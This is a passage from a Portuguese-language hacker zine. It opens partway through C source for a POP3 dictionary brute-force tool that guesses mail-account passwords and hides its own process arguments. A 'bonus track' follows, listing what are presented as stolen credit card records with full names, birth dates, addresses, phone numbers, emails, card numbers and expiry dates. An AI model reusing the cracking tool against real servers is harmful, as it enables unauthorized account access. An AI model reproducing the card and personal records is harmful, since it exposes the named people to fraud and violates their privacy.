void hackity_hack(void);


int popfd;
FILE *popfp;

FILE *userfile;
FILE *dictfile;

char host[255];
char dict[255];
char user[255];

main(int argc, char **argv)
{
   if(argc < 4)
   {
      /* invalid syntax, display syntax and exit */   
      printf("Syntax: %s host userfile dictfile\n", argv[0]);
      exit(0);
   }   
   
   /* Validate that the host exists */
   if(pop_connect(argv[1]) == -1)
   {
      /* Error */
      printf("Error connecting to host %s\n", argv[1]);
      exit(0);
   }
   printf("Connected to: %s\n\n", argv[1]);
   
   /* Check for the existance of the user file */
   userfile=fopen(argv[2], "rt");
   if(userfile==NULL)
   {
      /* Error */
      printf("Error opening userfile %s\n", argv[2]);
      exit(0);
   }
   fclose(userfile);
   
   /* Checking for the existance of dict file */
   dictfile=fopen(argv[3], "rt");
   if(dictfile==NULL)
   {
      /* Error */
      printf("Error opening dictfile %s\n", argv[3]);
      exit(0);
   }
   fclose(dictfile);
   
   /* Copy important arguments to variables */
   strcpy(host, argv[1]);
   strcpy(user, argv[2]);
   strcpy(dict, argv[3]);
               
   nuke_string(argv[0]);
   nuke_string(argv[1]);
   nuke_string(argv[2]);
   nuke_string(argv[3]);   
   strcpy(argv[0], MASKAS);

   swallow_welcome();   
   hackity_hack();
}

      
void nuke_string(char *targetstring)
{
   char *mystring=targetstring;
   
   while(*targetstring != '\0')
   {
      *targetstring=' ';
      targetstring++;
   }
   *mystring='\0';
}


int pop_connect(char *pophost)
{
   int popsocket;
   struct sockaddr_in sin;
   struct hostent *hp;
      
   hp=gethostbyname(pophost);
   if(hp==NULL) return -1;
   
   bzero((char *)&sin,sizeof(sin));
   bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
   sin.sin_family=hp->h_addrtype;
   sin.sin_port=htons(POP3_PORT);
   popsocket=socket(AF_INET, SOCK_STREAM, 0);
   if(popsocket==-1) return -1;
   if(connect(popsocket,(struct sockaddr *)&sin,sizeof(sin))==-1) return -1;
   popfd=popsocket;
   return popsocket;   
}


int pop_guess(char *username, char *password)
{
   char buff[512];
   
   sprintf(buff, "USER %s\n", username);
   send(popfd, buff, strlen(buff), 0);   
   getanswer(buff);
      
   sprintf(buff, "PASS %s\n", password);
   send(popfd, buff, strlen(buff), 0);
   getanswer(buff);
   if(strstr(buff, "+OK") != NULL)
   {
      printf("USERNAME: %s\nPASSWORD: %s\n\n", username, password);
      return 0;
   }
   else return -1;
}

char *getanswer(char *buff)
{
   for(;;)
   {
      getanswer_(buff);
      if(strstr(buff, "+OK") != NULL) return buff;
      if(strstr(buff, "-ERR") != NULL) return buff;
   }
}

char *getanswer_(char *buff)
{
   int ch;
   char *in=buff;
   
   for(;;)
   {
      ch=getc(popfp);
      if(ch == '\r');
      if(ch == '\n')
      {
         *in='\0';
         return buff;
      }
      else
      {
         *in=(char)ch;
         in++;
      }
   }
}

      
void swallow_welcome(void)
{
   char b[100];  
   popfp=fdopen(popfd, "rt");      
   getanswer(b);
}


void hackity_hack(void)
{
   char *un;
   char *pw;
   char *c;
   int found=0;
   
   un=(char *)malloc(512);
   pw=(char *)malloc(512);
   if(un==NULL || pw==NULL) return;
   
   userfile=fopen(user, "rt");
   dictfile=fopen(dict, "rt");
   if(userfile == NULL || dictfile == NULL) return;
   
   for(;;)
   {
      while(fgets(un, 50, userfile) != NULL)
      {
         found=0;
         c=strchr(un, 10);
         if(c != NULL) *c=0;
         
         c=strchr(un, 13);
         if(c != NULL) *c=0;
         
         while(fgets(pw, 50, dictfile) != NULL && found==0)
         {
            c=strchr(pw, 10);
            if(c != NULL) *c=0;
            
            c=strchr(pw, 13);
            if(c != NULL) *c=0;
            
            if(strlen(pw) > 2 && strlen(un) > 2)
               if(pop_guess(un, pw)==0)
               {
                  found=1;
                  fclose(popfp);
                  close(popfd);
                  if(RECONNECT==0)
                  {
                     free(pw);
                     free(un);
                     fclose(userfile);
                     fclose(dictfile);
                     exit(0);
                  }
                  pop_connect(host);
                  swallow_welcome();               
               }                           
         }
         fclose(dictfile);
         dictfile=fopen(dict, "rt");
      }
      fclose(dictfile);
      fclose(userfile);
      free(un);
      free(pw);
      exit(0);
   }
}

========={parde de cortar}==[Pop3hack.c]======{stop cutting}================



                  _                                         _   
                 { }_______________________________________{ }     
                 | |                                       | |  
                 | |             BONUS TRACK #2            | |  
                 | |                                       | |  
                 | |_______________________________________| |
                 {_}                                       {_}


                Bem como e sagrado aqui! HOT CC NUMBAS!!!!!!!

     BOTEI AKI O NUMERO DE CC DE UNS GRIGO PAU NO CÚ HEHEHEHEHEHEHE



Full Name: Matt Thompson        add prob
      DOB: 010465
  Address: 602 Castro, Mountain View
    State: CA, 94306, US
    Phone: 5104583432
    Email: mjt@netilus.com
       CC: 373239411213005 Expiry: 1299


Full Name: Yoshinori Hashimoto
      DOB: 070270
  Address: Higasiooizumi 3-19-3-401, Nerimaku
    State: tokyo, 178, japan
    Phone: 0353875161
    Email: s_b_y@i.bekkoame.or.jp
       CC: 4541147792557016 Expiry: 0999


Full Name: Khana Rao  add prob
      DOB: 1/2/73
  Address: 32 Javid Nagar, Madras
    State: TN, 600 032, INDIA
    Phone: 5657689
    Email: rkkumar@md2.vsnl.net.in
       CC: 376971885621001 Expiry: 1299


Name: Sean Brady
Address: 2750 Ocean Club Blvd. 
Apt. 207
City: Hollywood
State: FL
Zip: 33019
Country: USA
Phone: 954-921-4218
Card Type: Visa
Credit Card#: 4071-2951-0507-9786
Exp: 03/2001




==========================||||||||||||||||==================================
=	DISCONECTING, PLEASE WAIT          						   =
=		HALTING THE SYSTEM......           					   =		
=											         =		
=			SYSTEM IS HALTED							   =			
=					COME ON! GET OUTTA YOU TEXT VIWER/EDITOR     =		
==========================||||||||||||||||================================== 


         FCORP ZINE E UMA PRODUCAO DA FORBIDDEN CORPORATION®, ESTA PROTEGIDA
PELAS LEIS CORPRIGHTS :D

=================== DUVIDAS,CRITICAS OU ENXESSAO DE SACO ===================
ThAnAtH0s................ thanath0s@brasnet.org
FalkO.................... falko@brasnet.org




